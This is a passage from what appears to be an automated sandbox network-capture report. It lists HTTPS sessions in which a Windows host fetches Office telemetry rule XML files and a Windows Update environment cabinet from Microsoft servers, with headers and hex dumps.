                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            137192.168.2.64989313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                            x-ms-request-id: 2620e4ad-c01e-008d-6675-3b2eec000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141803Z-178bfbc474b9xljthC1NYCtw9400000001g000000000d7ky
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            138192.168.2.64989513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                            x-ms-request-id: 38a59648-401e-00ac-39a0-3b0a97000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141803Z-r1d97b99577brct2hC1TEBambg000000042000000000gwbt
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            139192.168.2.64989713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                            x-ms-request-id: c9275fb5-a01e-000d-708c-3ad1ea000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141803Z-r1d97b99577ndm4rhC1TEBf0ps0000000amg000000008089
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            140192.168.2.64989813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                            x-ms-request-id: 2155ac17-401e-00a3-238c-3a8b09000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141803Z-178bfbc474b9xljthC1NYCtw9400000001gg00000000ay85
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:03 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            141192.168.2.64990813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:05 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1391
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                            x-ms-request-id: 44a56bea-901e-0064-626a-3be8a6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141805Z-178bfbc474bwlrhlhC1NYCy3kg00000001f000000000r29n
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            142192.168.2.64990713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:05 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                            x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141805Z-178bfbc474bw8bwphC1NYC38b400000001bg00000000m99b
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            143192.168.2.64991013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:05 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1354
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                            x-ms-request-id: 119e228c-001e-0046-1663-3bda4b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141805Z-178bfbc474btvfdfhC1NYCa2en00000001ng00000000edm3
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            144192.168.2.64990952.149.20.212443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XReSa52zmeSff4o&MD=elPKToF1 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                            2024-11-21 14:18:06 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                            MS-CorrelationId: 7b481257-11ec-48d9-a982-b63d8227fa8a
                                                                                                                                                                                                            MS-RequestId: 57155f4f-742f-4899-889e-e04af002b6f6
                                                                                                                                                                                                            MS-CV: uFxU/t7Mk02lO/2z.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:04 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 30005
                                                                                                                                                                                                            2024-11-21 14:18:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                            2024-11-21 14:18:06 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            145192.168.2.64991113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:05 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                            x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141805Z-178bfbc474btvfdfhC1NYCa2en00000001p000000000cgxn
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
